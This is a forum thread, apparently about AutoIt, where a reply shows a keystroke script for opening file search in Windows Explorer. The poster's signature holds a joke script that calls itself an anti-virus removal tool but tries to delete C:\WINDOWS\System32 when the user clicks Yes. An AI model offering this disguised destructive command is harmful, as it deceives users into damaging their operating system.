Jump to content

file search ?


chun914
 Share

Recommended Posts

Update: (Didn't thing Send("!fle") would work but it did...at least on my computer. If your computer is slow it might not work.)

Run("explorer.exe")

WinWaitActive("My Documents")

Sleep(500)

Send("!d")

Sleep(500)

Send("C:\")

Sleep(500)

Send("{ENTER}")

WinActive("(C:)")

Sleep(500)

Send("!fle")
Edited by Firefoxy
;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...